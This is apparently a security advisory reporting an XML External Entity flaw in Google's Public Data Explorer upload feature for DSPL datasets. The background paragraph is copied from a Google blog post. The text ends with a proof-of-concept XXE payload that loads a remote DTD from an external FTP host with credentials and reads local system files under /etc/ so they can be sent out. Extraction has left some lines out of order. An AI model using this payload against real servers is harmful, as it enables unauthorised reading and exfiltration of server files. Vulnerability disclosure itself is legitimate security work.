Background
–
Extracted from http://googleblog.blogspot.com/2011/02/visualize your own data in google.html Over
the past two years, we’ve made public data easier to find, explore and understand in several ways,
providing unemployment figures, population statistics and world development indicators in search
Google (Public Data) XML External Entity Vulnerability
results, and introducing the Public Data Explorer tool. Together with our data provider partners, we’ve
curated 27 datasets including more than 300 data metrics. You can now use the Public Data Explorer to
visualize everything from labor productivity (OECD) to Internet speed (Ookla) to gender balance in
parliaments (UNECE) to government debt levels (IMF) to population density by municipality (Statistics
Catalonia), with more data being added every week.
Today, we’re opening the Public Data Explorer to your data. We’re making a new data format, the
Dataset Publishing Language (DSPL), openly available, and providing an interface for anyone to upload
their datasets. DSPL is an XML
based format designed from the ground up to support rich, interactive
visualizations like those in the Public Data Explorer. The DSPL language and upload interface are
available in Google Labs
PoC:
<!DOCTYPE root [ <!ENTITY % remote SYSTEM
"ftp://foo:bar@192.163.249.65/xxe.txt"> %remote; %param1; ]>
<!ENTITY % payload SYSTEM "file:///etc/”>
<!ENTITY % param1 '<!ENTITY % internal SYSTEM "%payload;" >' >
%param1; %internal
More:
http://www.securatary.com/Portals/0/Vulnerabilities/Google/Google%20XXE%20Attack.pdf